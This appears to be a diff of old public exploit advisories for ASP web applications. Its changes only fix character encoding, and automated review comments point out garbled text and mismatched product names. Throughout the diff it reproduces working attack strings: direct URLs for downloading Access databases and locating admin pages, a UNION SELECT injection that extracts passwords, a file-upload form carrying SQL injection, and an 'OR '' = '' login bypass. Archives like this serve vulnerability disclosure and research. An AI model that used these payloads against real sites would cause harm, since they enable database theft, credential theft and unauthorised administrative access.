| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com |
|
||||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : SQL Injection |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : [ AspBB ] - Active Server Page Bulletin Board |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Futility Forum 1.0 Revamp |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : htmlArea v2.03 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Uguestbook !talian script |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : BaalASP 2.0 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : FULLY FUNCTIONAL ASP FORUM - MtMWebForum 1.0 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : makit news/blog poster v3.1 |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
|
||||
| # Web Site : www.iq-ty.com |
|
||||
| # Script : Battle Blog |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
|
||||
| # Bug : DB |
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability
|
||||
[»]UranyumSoft Ýlan Servisi Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ UranyumSoft Ýlan Servisi ]
|
||||
[»] Script: [ UranyumSoft Ýlan Servisi ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/5420]
|
||||
[»] Download: [ http://aspindir.com/Goster/5420]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
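Review bot: Both copies of the title line and of the `Script:` line in this hunk still read "UranyumSoft Ýlan Servisi". "Ý" is what the Turkish "İ" becomes when Windows-1254 text is decoded as Latin-1, so whatever conversion this change applies does not repair the text. If the aim of the change is to normalise encodings, decode this file as Windows-1254 before writing it out as UTF-8. The `Founder:` line also opens with `[` and closes with `}` in both copies.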
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/database/db.mdb
|
||||
[»] http://server/[dizin]/database/db.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
|
||||
[»] Copyright 2008 UranyumSoft.com | Tüm haklarý saklýdýr.
|
||||
|
||||
[»] Admin Page: /yetki.asp
|
||||
[»] Admin Page: /yetki.asp
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] BlogWorx Blog Database Disclosure Vulnerability
|
||||
[»] BlogWorx Blog Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ BlogWorx Blog ]
|
||||
[»] Script: [ BlogWorx Blog ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://devworx.somee.com/]
|
||||
[»] Download: [ http://devworx.somee.com/]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,11 +47,11 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/db/users.mdb Or db/teadmin.mdb
|
||||
[»] http://server/db/users.mdb Or db/teadmin.mdb
|
||||
|
||||
|
||||
|
||||
[»] © 2008 devworx - devworx.somee.com
|
||||
[»] © 2008 devworx - devworx.somee.com
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Mini-NUKE v2.3 Freehost Multi Vulnerability
|
||||
[»]Mini-NUKE v2.3 Freehost Multi Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/3543]
|
||||
[»] Download: [ http://aspindir.com/Goster/3543]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,15 +47,15 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/db/mn7O4Z6J7L5W.mdb
|
||||
[»] http://server/db/mn7O4Z6J7L5W.mdb
|
||||
|
||||
[»] http://server/setup.asp
|
||||
[»] http://server/setup.asp
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
|
||||
[»] bu site motoru copyright © 2004 mini-nuke v2.3 kullanýlarak hazýrlanmýþtýr
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Baska Biri Bulduysa Affettsin :D
|
||||
[»] ~ Note : Baska Biri Bulduysa Affettsin :D
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Football Pool v3.1 Database Disclosure Vulnerability
|
||||
[»]Football Pool v3.1 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Football Pool v3.1 ]
|
||||
[»] Script: [ Football Pool v3.1 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://aspindir.com/Goster/742]
|
||||
[»] Download: [ http://aspindir.com/Goster/742]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
[»] My Home: [ RevengeHack.com ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://revengehack.com/[dizin]/data/NFL.mdb
|
||||
[»] http://revengehack.com/[dizin]/data/NFL.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
|
||||
[»] asp football pool v3.1 © 1999-2009 by mike hall. or 2009 Football Pool
|
||||
|
||||
[»] Admin Page: /userLogin.asp
|
||||
[»] Admin Page: /userLogin.asp
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -22,9 +22,9 @@
|
|||
|
||||
===[ Exploit SQL ]===
|
||||
|
||||
[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
|
||||
[ª]SQL : [Path]/details&newsID=[inj3ct C0dE]
|
||||
|
||||
[ª]dem0:
|
||||
[ª]dem0:
|
||||
|
||||
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
[»] ~ Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Acidcat CMS v 3.5 Multi Vulnerability
|
||||
[»]Acidcat CMS v 3.5 Multi Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
[»] Script: [ Mini-NUKE v2.3 Freehost ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com and Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
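Review bot: The `Script:` field in this header reads `[ Mini-NUKE v2.3 Freehost ]` in both copies, while the title a few lines above is "Acidcat CMS v 3.5 Multi Vulnerability" and the `Download:` link points at acidcat.com. The field looks carried over from the Mini-NUKE entry by the same author. Since the line is being rewritten here, either correct it to name Acidcat CMS or record that the mismatch comes from the original submission, so the entry is not indexed under the wrong product.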
@ -47,15 +47,15 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/databases/acidcat_3.mdb
|
||||
[»] http://server/[dizin]/databases/acidcat_3.mdb
|
||||
|
||||
[»] http://server/[dizin]/install.asp
|
||||
[»] http://server/[dizin]/install.asp
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
[»] Powered by Acidcat CMS v 3.5.1.f
|
||||
[»] Powered by Acidcat CMS v 3.5.1.f
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -16,27 +16,27 @@
|
|||
|
||||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability
|
||||
[»]KMSoft Guestbook v 1.0 Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ KMSoft Guestbook v 1.0 ]
|
||||
[»] Script: [ KMSoft Guestbook v 1.0 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://kmsoft.org]
|
||||
[»] Download: [ http://kmsoft.org]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org]
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -47,14 +47,14 @@
|
|||
|
||||
|
||||
|
||||
[»] http://server/[dizin]/db/db.mdb
|
||||
[»] http://server/[dizin]/db/db.mdb
|
||||
|
||||
|
||||
|
||||
|
||||
[»] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft
|
||||
[»] KMSoft Guestbook v 1.0 Powered by KMSoft or Powered by KMSoft
|
||||
|
||||
[»] Admin Page: /admin
|
||||
[»] Admin Page: /admin
|
||||
|
||||
|
||||
|
||||
|
@ -64,7 +64,7 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng
|
|||
Ar-ge.Org :Cyber_945,D3xer
|
||||
|
||||
|
||||
- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
|
||||
- Kritik Benim,Kritigi Ben Bellerim,Kýzdýrmayýn Benim Alayinizi Keserim
|
||||
- Ben Ne Heykirlar Gordum site heyklicek exploiti yok.Ben Ne exploitler gordum kullancak heykir yok :D
|
||||
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
| # DAte : 16/12/2009
|
||||
| # Web Site : www.iq-ty.com
|
||||
| # Script : Powered by YP Portal MS-Pro
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
| # Web Site : www.iq-ty.com
|
||||
| # Dork : Lebi soft Ziyaretci Defteri_v7.5
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
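Review bot: The `Dork` and `Script` header lines in the context of this hunk name different products: "Lebi soft Ziyaretci Defteri_v7.5" against "(VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International." The same `Script` line appears unchanged in the two files that follow, one of them with the dork "netGitar.com - Shop v1.0", which suggests a header copied between entries. Only `Tested on` is touched here, but the product name should be verified while these files are being edited, since it decides which software the entry is filed against.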
@ -6,7 +6,7 @@
|
|||
| # Web Site : www.iq-ty.com
|
||||
| # Dork : netGitar.com - Shop v1.0
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
| # Exploit :
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
| # Dork : Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved
|
||||
| # Dork1 : VP-ASP Shopping Cart 7.0
|
||||
| # Script : (VP-ASP Shopping Cart 7.0) Copyright (c) 1999-2010 Rocksalt International.
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.0
|
||||
| # Bug : DB
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
==============================================================================
|
||||
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
[»] ~ Note : Mutlu Yillar Millettt
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
|
||||
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
|
||||
|
||||
[»] Script: [ Erolife AjxGaleri VT ]
|
||||
[»] Script: [ Erolife AjxGaleri VT ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.aspindir.com/goster/4322]
|
||||
[»] Download: [ http://www.aspindir.com/goster/4322]
|
||||
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»]N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
@ -31,4 +31,4 @@
|
|||
|
||||
|
||||
|
||||
[»] http://localhost/path/db/ajxgaleri.mdb
|
||||
[»] http://localhost/path/db/ajxgaleri.mdb
|
|
@ -7,26 +7,26 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
|
||||
[»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ ABB Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Possede de tres nombreuses options d administration et de configuration ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ ABB Forums ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Possede de tres nombreuses options d administration et de configuration ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/fpdb/abb.mdb
|
||||
[»] http://server/[path]/fpdb/abb.mdb
|
||||
|
||||
|
||||
===[ Admin Login ]===
|
||||
|
||||
[»] http://server/[path]/admin.asp
|
||||
[»] http://server/[path]/admin.asp
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
|
|
@ -11,27 +11,27 @@
|
|||
========================================================================
|
||||
|
||||
======
|
||||
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
|
||||
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
|
||||
========================================================================
|
||||
|
||||
======
|
||||
[»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
|
||||
[»] Egreetings v1.0 b Remote Database Disclosure Vulnerability
|
||||
========================================================================
|
||||
|
||||
======
|
||||
|
||||
[»] Script: [ Egreetings ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Systeme d envoie de cartes de voeux ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ Egreetings ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Systeme d envoie de cartes de voeux ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/kort.mdb
|
||||
[»] http://server/[path]/kort.mdb
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
||||
|
|
|
@ -7,21 +7,21 @@
|
|||
|
||||
|
||||
==============================================================================
|
||||
[»] E-membres v1.0 Remote Database Disclosure Vulnerability
|
||||
[»] E-membres v1.0 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ E-membres ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Elle contient la partie d administration des membres ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ E-membres ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ Elle contient la partie d administration des membres ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/db/bdEMembres.mdb
|
||||
[»] http://server/[path]/db/bdEMembres.mdb
|
||||
|
||||
|
||||
Author: ViRuSMaN <-
|
||||
|
|
|
@ -11,7 +11,7 @@ Arbitrary File Upload
|
|||
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<p align="center">
|
||||
<input type=file name=uploadfile size=100><br> <br>
|
||||
<input type=submit value=Upload> </p>
|
||||
<input type=submit value=Upload> </p>
|
||||
</form>
|
||||
|
||||
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
==============================================================================
|
||||
[»] fipsForum v2.6 Remote Database Disclosure Vulnerability
|
||||
[»] fipsForum v2.6 Remote Database Disclosure Vulnerability
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ fipsForum ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
[»] Script: [ fipsForum ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Site page: [ fipsForum is a simple and easy to use Forum System with a MS Access database. ]
|
||||
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
|
||||
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
|
||||
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit ]===
|
||||
|
||||
[»] http://server/[path]/_database/forumFips.mdb
|
||||
[»] http://server/[path]/_database/forumFips.mdb
|
|
@ -26,7 +26,7 @@
|
|||
#
|
||||
# http://site/admin/index.asp
|
||||
#
|
||||
# Användarnamn(Username) : 'OR '' = '
|
||||
# Lösenord(password) : 'OR '' = '
|
||||
# Användarnamn(Username) : 'OR '' = '
|
||||
# Lösenord(password) : 'OR '' = '
|
||||
#
|
||||
################################################################################################
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com
|
||||
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
|
||||
| # Web Site : http://scripti.org/i/ucuzalsat.zip
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) IIS 5.1
|
||||
| # Bug : ASP DB Download
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
| # email : indoushka@hotmail.com
|
||||
| # Home : www.iqs3cur1ty.com/vb
|
||||
| # Web Site : http://dl.p30vel.ir/scripts/smans(www.p30vel.ir){a.allahparast}.zip
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
|
||||
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
|
||||
| # Bug : Backup Dump
|
||||
====================== Exploit By indoushka =================================
|
||||
# Exploit :
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
--------------------------------------------------------------------------------------
|
||||
#####################Sid3^effects aKa HaRi##################################
|
||||
